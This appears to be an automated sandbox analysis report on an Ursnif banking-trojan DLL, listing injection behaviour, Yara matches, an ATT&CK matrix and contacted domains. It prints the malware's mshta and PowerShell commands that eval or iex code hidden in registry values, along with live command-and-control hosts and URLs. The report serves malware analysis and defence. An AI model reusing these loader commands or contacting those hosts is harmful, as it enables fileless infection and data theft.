Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\51oepeny\51oepeny.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 88E31580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread created: unknown EIP: 88E31580

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Section loaded: unknown target: unknown protection: execute and read and write	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Thread register set: target process: 7076	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3440
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 3440

Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\cuuygyc1\cuuygyc1.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4puomjgc\4puomjgc.cmdline'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\lojdfmf3\lojdfmf3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3102.tmp' 'c:\Users\user\AppData\Local\Temp\cuuygyc1\CSCC66BFCF5E1994D52B7125888E8D0949B.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3577.tmp' 'c:\Users\user\AppData\Local\Temp\lojdfmf3\CSC1A2D97838D3A497FBCCAE884ABC3AAE9.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: unknown unknown

Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009C04D7 cpuid

0_2_009C04D7

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009CB585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

0_2_009CB585

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009BA027 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,

0_2_009BA027

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009C7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,

0_2_009C7AFF

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_009CB1E7 GetLastError,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,RtlInitializeCriticalSection,GetVersion,GetModuleHandleA,

0_2_009CB1E7

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436611302.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.542420710.0000000006FFB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437085492.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.480264315.00000000055AD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000003.604277729.00000232FA960000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483299200.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.599601381.0000018F76A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.531676520.00000000054AF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483227814.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483286163.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483203935.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483151802.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437340303.00000000056AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483178397.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483270828.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436829571.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437112820.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.593087987.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.436872189.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.599754815.0000000000D00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437218385.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.437202688.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.435392429.0000000005828000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.483251728.0000000007178000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6224, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6352, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6200, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation2	Valid Accounts1	Valid Accounts1	Obfuscated Files or Information2	Credential API Hooking3	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Access Token Manipulation1	Software Packing1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter12	Logon Script (Windows)	Process Injection412	Rootkit4	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Logon Script (Mac)	Masquerading1	NTDS	System Information Discovery35	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol4	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Valid Accounts1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Security Software Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion3	DCSync	Virtualization/Sandbox Evasion3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Process Injection412	Proc Filesystem	Process Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Rundll321	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Invalid Code Signature	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
u8xtCk7fq8.dll	33%	Virustotal		Browse
u8xtCk7fq8.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.loaddll32.exe.2950000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen		Download File

Domains

Source	Detection	Scanner	Link
c56.lepini.at	8%	Virustotal	Browse
api3.lepini.at	11%	Virustotal	Browse
go.in100k.at	7%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFo	100%	Avira URL Cloud	malware
http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/6izVNWCf_2/BuY7MmzZCc40Rhjlu/B4FbRUu_2FOa/7V0Ff9EtB1A/GAZdoYUkX2pBQy/DpMAjJMM0d1LaayU4tu_2/Fsf5ndznFCuQrj3e/8VhAjUXdrSXwe0n/HOOcG0t_2FpMgIGwve/oERmGT4tA/XmAqCpIkdN_2FImpVylW/FHybdHaObNxlM3otB6A/Y5ae5imM74agsv2hL9KKKN/UaXEdvmu64Qap/TG_2FQ9U/mG6Y2EiFIZCIHUi9iJIG41z/L0LjQmKgxf/OtAgg8QY5/yM8_2B0	100%	Avira URL Cloud	malware
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://api3.lepini.at/api1/bEXxGnisNWK6xtmL7/hzYrMk4fVaqx/ViX9ZT9idqj/PQ9QlS_2Bewcsf/axkcAfr_2BzxGO9WnlqBd/umvUtqC2JD_2FbD6/jRIZuLHLzIoCsIu/th8f7Grv16LoelmZNm/uRoB0I5fl/RyNL47ZLZhHArmxOZnfP/f8ypX_2FMmc9Wn_2Fb7/mm90yk6M3N263p5s7_2FO7/65Wq2SHNyz0Tb/buzgvD7t/7CozDKzLEzGVXehbrpYH8bp/nDYW5twoJN/W5eyx_2BFnpNnvPUb/ZwRm3Bx_2BLc/U7tdViUVaKh/lB3EcM6_2BV2AV/kX7gmeVC/Z2x2FOp	0%	Avira URL Cloud	safe
http://go.in100k.at/favicon.ico	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://api3.lepini.at/api1/LMJLtOqdu8fp_2BNLOB5YBP/qly_2BfzDH/EAemu37KWi1Sk2xGU/KUNgOk1dCHS6/AgjNesC_2FL/0VRR3489g9d213/hnGFcgoP3NnJY57aNNU7X/g37VutmCLLvxlC3K/uWdTjPXn7_2BhUq/Ng_2FAVek6bgpkb4dt/OleaxmqWa/3cqZOMqKlEvnCHKOagPS/Ml3FT3Cf6J9pNtnQsAy/H2GMz5cmt0xhyUBUDbZV2P/wT6YuW4qyfVDR/pXcknYbm/8zZh_2FbRECix2oRrtcd2ZU/_2B7miWVVc/ZZTomZrPf3ghqQ7Sj/_2FENCrsSLt7/pXfjB	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://api10.laptok.at/favicon.ico	0%	Avira URL Cloud	safe
http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/	100%	Avira URL Cloud	malware
http://go.in100k.at/api1/6shKz_2BQVnN/OCP1pP4Tyvc/HZOndob_2FtP7a/idZHTuxKtsPI9_2BbDL_2/BF4JwIYV_2B7TAX4/McJ52rW1_2FgARN/40faJ26v_2FkZz1ElZ/d_2BmWnTR/ElzVYUi1oSGpXwpyCzo4/qnIAV1aIx5Bi1e_2B9P/F_2F3VBYsuFw9rFe9x8MBm/BOzSVExVFj_2F/uL_2BJ_2/BhPryJhLkRIvqsfR1DhX_2B/yer6vsREF4/n6YQE_2F_2FK5FDnd/llvOW2cpbliJ/dWtAimwUgXd/EZllvyGgYHINZb/iZ7az3_2FONnJ152lupGR/GoLcwVw9tDIcG6Ji/6Z9JjQwVkidC5aO/Ark1JBZjGu7c/4Glkh	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txt	0%	Avira URL Cloud	safe
http://api10.laptok.at/api1/qYtT2W6uUWYJe_2BzG0bJ6/f78jap2G9vTVk/IGsP0y4o/fylIZ_2BQ_2FE0eKcgRyOZV/bwC_2FjfVv/DbtDrQABR9ML9yi1I/a0_2FluH0sU4/80C1scx2jQi/Sm75TjK2Hru6lN/LiAEhJ6pLxTSd4lLSPDNE/hnQ63sbU9X_2Fzoj/gMi3emWWJ488JmV/OalYx6aLrHAsj_2FD5/gwLYQsfyc/LLUkPczTLA0_2B21Yg9i/Zuc0lw0nukK632v8MOb/hMd02siaNyV1doJYj48PSY/dhZQ85SXuAqzk/d_2FIgou/B6fGbyYsoLl0lNh77c_2Blt/2Rm26	0%	Avira URL Cloud	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://c56.lepini.at/jvassets/xI/t64.dat	100%	Avira URL Cloud	phishing
http://api3.lepini.at/api1/5I7pLP9QNe/N5buyckYCrgoPqvPA/NjC86WmFUumJ/d5ZJk2tc_2B/naCfPReUYVV3Vx/ldXi9UGRyYBJQ_2Fncfms/yLLq_2F_2FAO72XM/I_2BWOGHGpoip8O/L_2FeZA1PRI5XY_2BB/j3rs0r3Qi/LjAFf6GJs2hLttaGlvqk/QXt9zzN9fNRamdHdcye/Eig_2Fsi5CrdV1iAkxdGXk/dY8xK6yf2XhnW/0wyvHV0p/pz8P8_2FIx_2BIgHiQgkzmF/pVcGr3XY_2/F0IzfpDiL0qRGlWkz/h5CX5vmyOkVW/KUlweXnwefm/x2MMNvATag8_2F/nIODL_2BJ417QebINK55v/VFjAtH9us6H/2M	0%	Avira URL Cloud	safe
http://golang.feel500.at/favicon.ico	100%	Avira URL Cloud	malware
http://golang.feel500.at/api1/cQHZbpVEoMes2jDUrR_2F/bktLNyGZ_2BiAtXa/xg4NyCOv1cwnNr2/CgkDzrwWZPupVFoQNH/s8j31toeM/WHQs0DfRjGaPCW6Sk_2F/P21C2qJ3xd8l4QW1_2F/_2BCijsFomil85BW5tjyOE/vC4SLWVsudj9d/6p03Rh40/Oja1RIlTt_2F7DIg_2BdfV_/2F8i4PYPiF/iz_2FhrCPH_2B_2BQ/XXMADzrcnZWI/Hfv_2Bg59ad/cN7apglT0lQ7sQ/gNChqsZOPXttxVF41ze7_/2BkKWJ0wITm6Vd4A/wCJ1rQ02kuFRKOd/FLdCUCore_2F0Msy7C/S_2BUR4fF/nA78eeAv6Ywkiob/VeCW9pRE	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
c56.lepini.at	35.228.31.40	true	true	8%, Virustotal, Browse	unknown
resolver1.opendns.com	208.67.222.222	true	false		high
api3.lepini.at	35.228.31.40	true	false	11%, Virustotal, Browse	unknown
go.in100k.at	35.228.31.40	true	false	7%, Virustotal, Browse	unknown
golang.feel500.at	35.228.31.40	true	false		unknown
api10.laptok.at	35.228.31.40	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://golang.feel500.at/api1/6DXTv_2FudTfVxedDD3UMQ/xS_2FoOKoiAeF/j0VSQAcL/gS9HWeAk0_2F3Z4xgoE9VU8/6izVNWCf_2/BuY7MmzZCc40Rhjlu/B4FbRUu_2FOa/7V0Ff9EtB1A/GAZdoYUkX2pBQy/DpMAjJMM0d1LaayU4tu_2/Fsf5ndznFCuQrj3e/8VhAjUXdrSXwe0n/HOOcG0t_2FpMgIGwve/oERmGT4tA/XmAqCpIkdN_2FImpVylW/FHybdHaObNxlM3otB6A/Y5ae5imM74agsv2hL9KKKN/UaXEdvmu64Qap/TG_2FQ9U/mG6Y2EiFIZCIHUi9iJIG41z/L0LjQmKgxf/OtAgg8QY5/yM8_2B0	true	Avira URL Cloud: malware	unknown
http://api3.lepini.at/api1/bEXxGnisNWK6xtmL7/hzYrMk4fVaqx/ViX9ZT9idqj/PQ9QlS_2Bewcsf/axkcAfr_2BzxGO9WnlqBd/umvUtqC2JD_2FbD6/jRIZuLHLzIoCsIu/th8f7Grv16LoelmZNm/uRoB0I5fl/RyNL47ZLZhHArmxOZnfP/f8ypX_2FMmc9Wn_2Fb7/mm90yk6M3N263p5s7_2FO7/65Wq2SHNyz0Tb/buzgvD7t/7CozDKzLEzGVXehbrpYH8bp/nDYW5twoJN/W5eyx_2BFnpNnvPUb/ZwRm3Bx_2BLc/U7tdViUVaKh/lB3EcM6_2BV2AV/kX7gmeVC/Z2x2FOp	false	Avira URL Cloud: safe	unknown
http://go.in100k.at/favicon.ico	false	Avira URL Cloud: safe	unknown
